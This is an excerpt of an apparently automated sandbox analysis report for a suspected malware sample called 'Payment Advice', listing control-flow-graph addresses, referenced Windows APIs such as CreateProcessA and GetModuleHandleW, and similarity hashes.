                                                                        control_flow_graph 514 7969550-79695e5 516 79695e7-79695f1 514->516 517 796961e-796963e 514->517 516->517 518 79695f3-79695f5 516->518 524 7969677-79696a6 517->524 525 7969640-796964a 517->525 519 79695f7-7969601 518->519 520 7969618-796961b 518->520 522 7969605-7969614 519->522 523 7969603 519->523 520->517 522->522 526 7969616 522->526 523->522 531 79696df-7969799 CreateProcessA 524->531 532 79696a8-79696b2 524->532 525->524 527 796964c-796964e 525->527 526->520 529 7969650-796965a 527->529 530 7969671-7969674 527->530 533 796965e-796966d 529->533 534 796965c 529->534 530->524 545 79697a2-7969828 531->545 546 796979b-79697a1 531->546 532->531 535 79696b4-79696b6 532->535 533->533 536 796966f 533->536 534->533 537 79696b8-79696c2 535->537 538 79696d9-79696dc 535->538 536->530 540 79696c6-79696d5 537->540 541 79696c4 537->541 538->531 540->540 542 79696d7 540->542 541->540 542->538 556 796982a-796982e 545->556 557 7969838-796983c 545->557 546->545 556->557 558 7969830 556->558 559 796983e-7969842 557->559 560 796984c-7969850 557->560 558->557 559->560 561 7969844 559->561 562 7969852-7969856 560->562 563 7969860-7969864 560->563 561->560 562->563 566 7969858 562->566 564 7969876-796987d 563->564 565 7969866-796986c 563->565 567 7969894 564->567 568 796987f-796988e 564->568 565->564 566->563 570 7969895 567->570 568->567 570->570
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07969786
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1767590838.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7960000_Payment Advice.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 98fd82b64b17a3d4cdf484f9e68341b11c1bc7739e72729fd4ce9c003d1f29e2
                                                                        • Instruction ID: 45bdb92fcf1ab66fffb0cfdd1b330ab763a47255df7da9fe8630f45bdc5cf808
                                                                        • Opcode Fuzzy Hash: 98fd82b64b17a3d4cdf484f9e68341b11c1bc7739e72729fd4ce9c003d1f29e2
                                                                        • Instruction Fuzzy Hash: B8915CB1D0075ACFDF24CF69C845BEDBAB6BF48324F048269D809A7240DB74A985CF91
                                                                        Function 0110B0C8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 571 110b0c8-110b0d7 572 110b103-110b107 571->572 573 110b0d9-110b0e6 call 1109b40 571->573 575 110b109-110b113 572->575 576 110b11b-110b15c 572->576 579 110b0e8 573->579 580 110b0fc 573->580 575->576 582 110b169-110b177 576->582 583 110b15e-110b166 576->583 629 110b0ee call 110b350 579->629 630 110b0ee call 110b360 579->630 580->572 584 110b179-110b17e 582->584 585 110b19b-110b19d 582->585 583->582 587 110b180-110b187 call 110ad58 584->587 588 110b189 584->588 590 110b1a0-110b1a7 585->590 586 110b0f4-110b0f6 586->580 589 110b238-110b2f8 586->589 592 110b18b-110b199 587->592 588->592 622 110b300-110b32b GetModuleHandleW 589->622 623 110b2fa-110b2fd 589->623 593 110b1b4-110b1bb 590->593 594 110b1a9-110b1b1 590->594 592->590 597 110b1c8-110b1d1 call 110ad68 593->597 598 110b1bd-110b1c5 593->598 594->593 602 110b1d3-110b1db 597->602 603 110b1de-110b1e3 597->603 598->597 602->603 604 110b201-110b205 603->604